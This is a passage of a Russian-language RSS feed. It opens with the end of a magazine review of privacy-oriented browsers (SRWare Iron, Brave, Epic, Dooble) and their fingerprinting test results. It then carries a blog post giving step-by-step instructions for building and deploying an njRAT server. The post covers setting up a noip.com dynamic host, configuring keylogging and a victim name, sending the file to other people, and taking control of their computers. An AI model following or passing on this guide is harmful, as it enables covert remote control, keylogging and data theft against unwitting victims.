    <img src="https://xakep.ru/wp-content/uploads/2020/08/317860/secbr_04.jpg#26821622" width="1279" />
    <figcaption>Железный утюг SRWare Iron</figcaption>
  </figure>
  <ul>
    <li>Qualys Browser Check пожаловался мне на устаревшую версию Google Chrome (83.0.4250) и сообщил, что она небезопасна.</li>
    <li>Тест Cloudflare продемонстрировал показатели, аналогичные браузерам Comodo, — включенная поддержка TLS 1.3, но претензии к DNSSEC и Encrypted SNI.</li>
    <li>Panopticlick ругнулся на стандартный набор проблем с приватностью (все тесты оказались провалены) и между делом заметил, что если в SRWare Iron и присутствует какой-то блокировщик рекламы, то он не работает.</li>
    <li>Privacy Analyzer и Webkay сообщили, что «Железяка» отдает наружу данные о версии браузера, версии и разрядности ОС, IP-адрес, все сведения о железе (включая модель видеокарты, экранное разрешение и состояние батареи), однако данные о локальной сети остались для Webkay тайной.</li>
  </ul>
  <h3>Brave</h3>
  <ul>
    <li>Разработчик: Brave Software</li>
    <li>Сайт: <a href="https://brave.com/" target="_blank">brave.com</a></li>
  </ul>
  <p>Создатели браузера Brave утверждают, что их продукт на базе Chromium, как никакой другой, предотвращает трекинг и возможные утечки данных. Одна из фишек Brave — возможность отправлять криптовалютные платежи веб-сайтам и создателям контента в виде <a href="https://basicattentiontoken.org/" target="_blank">Basic Attention Tokens</a> — разработанной Brave Software криптовалютной платформы на базе Etherium.</p>
  <p>В 2017 году, кода платформа была впервые запущена, Brave Software продала токенов на сумму более 35 миллионов долларов США, а новым пользователям платформы раздали в целях привлечения в общей сложности 300 тысяч токенов. Пользователи браузера Brave могут зарабатывать токены за просмотр рекламы или платить создателям контента — либо отправляя микротранзакции, либо используя встроенную функцию Brave, когда заранее установленная сумма вознаграждения распределяется автоматически между владельцами зарегистрированных в системе сайтов в зависимости от того, сколько времени юзер провел за просмотром контента.</p>
  <p>Существуют версии браузера для Windows, macOS, Linux, а также Android и iOS. Мы рассмотрим только первую из них, интерфейс которой, как и следовало ожидать, косплеит Chrome.</p>
  <figure class="m_original">
    <img src="https://xakep.ru/wp-content/uploads/2020/08/317860/secbr_05.jpg#26821622" width="1279" />
    <figcaption>Криптовалютный браузер Brave</figcaption>
  </figure>
  <ul>
    <li>Qualys Browser Check показал, что текущая версия Chrome актуальна, обновления не требуется.</li>
    <li>Тест Cloudflare не продемонстрировал ничего нового — аналогичный результат был и у браузеров Comodo, и у Iron.</li>
    <li>А вот Panopticlick дал неожиданный результат: как оказалось, Brave успешно блокирует рекламу, автоматический трекинг, но при этом не отправляет DNT и обладает характерным «отпечатком», по которому его можно вычислить.</li>
    <li>Privacy Analyzer и Webkay удивили еще больше: оба сайта не показали мой IP-адрес и локацию, хотя сервисы вроде WhatIsMyIP его без проблем определили. Браузер передал данные о версии и разрядности ОС, железе (включая процессор, графический адаптер, экранное разрешение и состояние батареи). В качестве User Agent программа использует <code>Chrome 84.0.4147.125</code>.</li>
  </ul>
  <p>В целом — неплохой результат. С учетом того что приложение работает достаточно быстро (хотя по ощущениям и медленнее Iron), к нему явно стоит присмотреться.</p>
  <h3>Epic</h3>
  <ul>
    <li>Разработчик: Hidden Reflex</li>
    <li>Сайт: <a href="https://epicbrowser.com/" target="_blank">epicbrowser.com</a></li>
  </ul>
  <p>Этот браузер разработан компанией, базирующейся в Бангалоре (Индия) с представительством в Вашингтоне. Тут мне нестерпимо хотелось пошутить про индусский код, но Epic, как и его конкуренты, основан на Chromium, поэтому код там гугловский. Разработчик программы Алок Бхардвадж (Alok Bhardwaj) утверждает, что Epic успешно блокирует трекинг, фингерпринтинг, назойливую рекламу, криптомайнинг <s>и магию вуду</s>. Помимо версии для Windows, на сайте можно скачать релиз для macOS, там же присутствуют ссылки на Google Play и App Store для скачивания мобильных версий.</p>
  <figure class="m_original">
    <img src="https://xakep.ru/wp-content/uploads/2020/08/317860/secbr_06.jpg#26821622" width="1279" />
    <figcaption>Это просто Epic какой-то</figcaption>
  </figure>
  <p>Сразу после запуска приложения юзер видит грозное предупреждение о том, что некоторые функции браузера, такие как встроенный VPN, прокси и блокировщик рекламы, нужно установить отдельно в виде плагинов, доступных на специальной страничке Epic Extension Store. Чем в таком случае Epic отличается от обычного «Хрома», в котором тоже можно настроить прокси и VPN с помощью плагинов, для меня осталось загадкой. Что ж, посмотрим, что умеет этот браузер из коробки с настройками по умолчанию.</p>
  <ul>
    <li>Qualys Browser Check — проблем и замечаний нет.</li>
    <li>Cloudflare — результат, аналогичный Comodo и Iron.</li>
    <li>Panopticlick — браузер успешно блокирует рекламу и попытки трекинга, но не посылает DNT и имеет характерный «отпечаток».</li>
    <li>Privacy Analyzer — тест «подвис» на определении IP-адреса и геолокации, результата я так и не дождался.</li>
    <li>Webkay — сервис успешно определил мой IP и версию ОС, но не показал решительно никаких данных о железе, кроме разрядности процессора. Браузер определяется как <code>Chrome 84.0.4147.105</code>.</li>
  </ul>
  <p>Глядя на название продукта, я предвкушал, что можно будет написать об «эпик фейл», но на удивление браузер зарекомендовал себя совсем неплохо. Блокировка рекламы, трекинга, а также минимум передаваемых наружу данных, и все это без дополнительных плагинов — довольно серьезная заявка на успех.</p>
  <h3>Dooble Web Browser</h3>
  <ul>
    <li>Разработчик: Dooble Project Team</li>
    <li>Сайт: <a href="https://textbrowser.github.io/dooble/" target="_blank">textbrowser.github.io/dooble/</a></li>
  </ul>
  <p>Разработка этого браузера с открытым исходным кодом началась двенадцать лет назад. Интерфейс Dooble основан на Qt, а само приложение кросс-платформенное: есть версии для FreeBSD, Linux, macOS, OS/2 и Windows, причем в виде портативной версии для всех платформ. Дистрибутив можно скачать с <a href="http://textbrowser.github.io/dooble/" target="_blank">GitHub</a> в виде ZIP-архива, в котором находится исполняемый файл и все нужные библиотеки.</p>
  <p>С настройками по умолчанию Dooble автоматически удаляет cookies, а хранимые в программе данные шифруются (за исключением информации о пользовательских настройках). Браузер применяет сессионную модель с использованием временных ключей, при этом парольную фразу можно изменить без потери данных. Мастер-пароль нужно создать в настройках при первом запуске Dooble, иначе при завершении работы все сохраненные в браузере данные будут стерты. Эти функции позволяют условно отнести Dooble к категории безопасных браузеров.</p>
  <p>На моей виртуалке с Windows 10 Dooble наотрез отказался запускаться, ругаясь на отсутствие какой-то библиотеки, зато на хостовой машине с Windows 7 он неожиданно заработал. Внешнее оформление программы можно охарактеризовать фразой «привет из девяностых» — у меня он даже выдавил ностальгическую слезу.</p>
  <figure class="m_original">
    <img src="https://xakep.ru/wp-content/uploads/2020/08/317860/secbr_07.jpg#26821622" width="1165" />
    <figcaption>Dooble — кросс-платформенный браузер на Qt</figcaption>
  </figure>
  <p>Сравнительные тесты дали следующие результаты.</p>
  <ul>
    <li>Qualys Browser Check — обозвал Dooble небезопасной версией Google Chrome — видимо, из-за используемого браузером User Agent.</li>
    <li>Cloudflare — результат, аналогичный Comodo, Iron, Epic и Brave.</li>
    <li>Panopticlick — полный провал теста по всем пунктам.</li>
    <li>Privacy Analyzer и Webkay — браузер передал IP-адрес, данные об ОС и железе, геолокацию, экранное разрешение. Внешним сервисам программа представляется как <code>Chrome 84.0.4147.163</code>.</li>
  </ul>
  <p>Пожалуй, Dooble — самый быстрый из всех браузеров, опробованных мной в этом эксперименте. С учетом того что он представлен в виде портативной версии, приложение может быть очень полезно для систем, в которых затруднена установка программ. Также, вероятно, браузер придется по вкусу пользователям BSD и Linux. Работоспособность приложения в Windows 10 вызывает определенные сомнения.</p>
  <h3>Выводы</h3>
  <p>Итоги эксперимента получились неоднозначные. Вопреки ожиданиям, лучшие результаты показала не продукция прославленной компании Comodo, а вполне скромные Brave и Epic. Однако неплох и Comodo Ice Dragon — он отправляет наружу меньше данных об устройстве, чем его собрат. Comodo Dragon я бы поставил на четвертое место. Владельцам устройств со слабым железом и старыми версиями ОС может прийтись по вкусу Dooble, который отличается неплохим быстродействием. А вот Waterfox и Iron утюгом нырнули на самое дно нашего скромного рейтинга — они хуже конкурентов справляются с рекламой и блокировкой трекинга.</p>
  <p>Очевидно, что ни одна из перечисленных в сегодняшней статье программ не может обеспечить полную анонимность и безопасность в интернете. Для настоящей конфиденциальности нужно использовать VPN (<a href="https://t.me/FCK_RKN_bot" target="_blank">например, наш<strong> VPN</strong></a>с пробным периодом в десять дней) отключать в настройках браузера обработку скриптов, использовать шифрованные контейнеры для хранения данных форм и паролей. Кроме того, существует широкий ассортимент плагинов, ориентированных на повышение уровня безопасности при работе в сети.</p>
  <p>Xaker, Валентин Холмогоров</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hata_hack/FRib1Z82Y</guid><link>https://teletype.in/@hata_hack/FRib1Z82Y?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack</link><comments>https://teletype.in/@hata_hack/FRib1Z82Y?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack#comments</comments><dc:creator>hata_hack</dc:creator><title>Как удаленно взломать компьютер с помощью NJRAT</title><pubDate>Thu, 27 Aug 2020 05:46:25 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/b0/9d/b09d5aa6-5ec9-438e-8546-2ee97db13468.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/e7/c4/e7c4e573-468d-4876-87e2-af5014621931.png"></img>Инструмент удаленного администрирования (RAT) – это запрограммированный инструмент, который позволяет удаленному устройству управлять системой, как если бы у него был физический доступ к этой системе. В то время как совместное использование рабочего стола и удаленное администрирование имеют много законных применений, программное обеспечение «RAT» обычно связано с несанкционированной или злонамеренной деятельностью. NjRat – одна из лучших RAT. Это позволяет получить доступ к удаленному компьютеру и легко выполнять любые удаленные задачи. В этом уроке я расскажу вам, как удаленно взломать компьютер с помощью njRat.]]></description><content:encoded><![CDATA[
  <p>Инструмент удаленного администрирования (RAT) – это запрограммированный инструмент, который позволяет удаленному устройству управлять системой, как если бы у него был физический доступ к этой системе. В то время как совместное использование рабочего стола и удаленное администрирование имеют много законных применений, программное обеспечение «RAT» обычно связано с несанкционированной или злонамеренной деятельностью. NjRat – одна из лучших RAT. Это позволяет получить доступ к удаленному компьютеру и легко выполнять любые удаленные задачи. В этом уроке я расскажу вам, как удаленно взломать компьютер с помощью njRat.</p>
  <p></p>
  <figure class="m_original">
    <img src="https://teletype.in/files/e7/c4/e7c4e573-468d-4876-87e2-af5014621931.png" width="480" />
  </figure>
  <h2>КАК УДАЛЕННО ВЗЛОМАТЬ КОМПЬЮТЕР С NJRAT?</h2>
  <h3>ТРЕБОВАНИЯ:</h3>
  <ul>
    <li>njRat (инструмент удаленного администрирования).</li>
    <li>Динамический IP / хост.</li>
    <li>DUC (Клиент Noip.com)</li>
    <li>Открытый порт.</li>
  </ul>
  <h3>ШАГИ:</h3>
  <p>1) Загрузите njRat v0.8 как обновленную версию. Вы также можете работать с любой старой версией, если хотите.</p>
  <p>2) Зайдите на сайт noip.com и зарегистрируйтесь. После регистрации вы увидите поле, как показано ниже, для ввода имени хоста. Введите любое имя, выберите любой tld из выпадающего меню и нажмите кнопку «Добавить хост».</p>
  <figure class="m_original">
    <img src="https://i1.wp.com/www.ethicalhackingtutorials.com/wp-content/uploads/2017/04/noip-host-name.png?resize=716%2C256&ssl=1" width="716" />
  </figure>
  <p>3) Хорошо. Давайте откроем njRat и начнем строить сервер. Когда вы откроете окно, появится всплывающее окно, как показано на скриншоте ниже. Пожалуйста, введите порт, который хотите использовать. Я бы рекомендовал порт по умолчанию 1605. Введите 1605 и нажмите кнопку ОК.</p>
  <figure class="m_original">
    <img src="https://i1.wp.com/www.ethicalhackingtutorials.com/wp-content/uploads/2017/04/njRat-start-screen.png?resize=715%2C330&ssl=1" width="715" />
  </figure>
  <p>4) После нажатия Ok нажмите кнопку Build. И заполните все поля, как я сделал на скриншоте. Убедитесь, что вы ввели собственное имя хоста в поле хоста. Введите порт 1605. В имени жертвы вы можете указать любое имя, какое захотите. Размер KeyLogs подходит для 20. Выбирает каталог, в котором вы хотите разместить свой сервер. И дайте ему имя exe. Вы также можете использовать значок, отметив значок. Но пока я не буду им пользоваться.</p>
  <figure class="m_original">
    <img src="https://i2.wp.com/www.ethicalhackingtutorials.com/wp-content/uploads/2017/04/njRat-Build-Settings.png?resize=562%2C283&ssl=1" width="562" />
  </figure>
  <p>5) Когда вы нажмете кнопку «Создать», вам будет предложено ввести имя, указать любое имя и нажать «Сохранить». Начнется создание сервера. Вы увидите диалоговое окно успеха. Теперь сервер готов к распространению на другие компьютеры. Вы можете отправить его кому-нибудь через онлайн-файлы или любым физическим способом. Обязательно заархивируйте его перед копированием на любой физический носитель.</p>
  <p>6) Теперь нам нужно открыть порты. Это немного другая часть.</p>
  <p>7) Загрузите DUC и введите свое имя пользователя и пароль на noip.com.</p>
  <p>8) Все готово … Теперь мы в порядке. Когда кто-то откроет созданный нами сервер на своей машине, он окажется у нас в руках и появится в окне njRat. Вы можете выполнять на компьютере жертвы любое действие, какое захотите.</p>
  <p data-align="center">Вот и все ..</p>
  <p>Надеюсь, вы научились удаленно взламывать компьютер с помощью njRat.</p>

]]></content:encoded></item></channel></rss>